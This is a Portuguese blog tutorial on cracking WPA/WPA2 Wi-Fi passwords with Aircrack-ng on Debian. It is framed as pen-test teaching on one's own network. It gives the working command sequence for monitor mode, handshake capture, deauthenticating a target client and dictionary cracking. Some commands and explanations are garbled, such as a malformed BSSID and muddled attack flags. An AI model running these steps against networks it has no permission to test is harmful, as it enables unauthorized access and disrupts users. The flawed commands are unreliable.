Ads Top

Como utilizar o Aircrack-ng

Boas praticas de Pen Test no Debian usando o Aircrack-ng

 

Quebrando redes WIFI com WPA/WPA2 Usando o Debian 8



Saiba um pouco mais sobre a segurança da WPA/WPA2

Ela veio para suprir a necessidade de uma melhor segurança, já que a WPE não estava mais garantindo este quesito, ela é um protocolo de criptografia que suporta configurações pessoais e empresariais, fazendo uso de uma chave pré compartilhada, com a adição de um servidor Remote Authentication Dial-In User Service (RADIUS) para gerenciar as chaves de autenticação enviadas pelos clientes no momento do pedido de conexão.
Com este tutorial iremos fazer a analise de redes e seus protocolos de segurança, sendo de exclusivo intuito divulgar o conhecimento sobre realização de Pen Test
Para tal procedimento indicamos que você utilize sua própria rede de teste, sendo um ambiente controlado e que não prejudicara ninguém. Tenha uma boa leitura.
 

Comandos auxiliares 

Mostrar o IP configurado e placas de rede ativas no computador

# iwconfig
# ifconfig

Instalando o Aircack-ng


Digite o comando a seguir no terminal
# apt-get install aircrack-ng

Então vamos iniciar o ataque

O inicio do ataque e rápido e pratico vamos ao passo a passo

ativando a placa de rede wireless
# ifconfig wlan0 up

Buscando redes ao seu redor
neste ponto e importante o mac da rede e o seu canal de operação
# iwlist wlan0 scanning

3º mudar a placa de rede para o modo monitor (Airmon)
Ativando o modo. Será criada a interface Wlan0mon
# airmon-ng start wlan0 

4 º Vamos partir para a captura de pacotes e aguardar ate que um handshake seja efetuado para podemos capturar os pacotes deste aperto de mãos entre o roteador e o terminal, para isso usamos o comando
# airodump-ng wlan0mon --bssid 00: 00:00 00: 00: 00: 00 --channel 6 --write arquivodecapturaWPA2

ou
Derrubando um cliente autentico
Digite o comando a seguir:

# aireplay-ng -1 0 -a bssid_da_rede -h Mac_do_alvo wlan0mon0 

Resumindo: '-1' é o tipo de ataque, no nosso caso a autenticação falsa.

 Ex: # aireplay-ng -0 1 -a 00:00:00:00:00:00 -c 01:10:00:00:00:00 wlan0mon0

Para testar as senhas da sua wordlist com o arquivo handshak capturado faça o seguinte comando:
# aircrack-ng "nome do arquivo que você criou cap" -w "nome do arquivo de dicionário"


Notas:
Retire as aspas duplas dos arquivos quando lançados no terminal
Lembrando que o sucesso deste tipo de ataque esta ligado a qualidade da sua wordlist em relação ao seu alvo.


Ao termino da captura e você quiser sair do modo monitor (Mon) faça o seguinte procedimento:

# airmon-ng stop wlan0 

airmon-ng stop wlan0mon

Nenhum comentário:

Tecnologia do Blogger.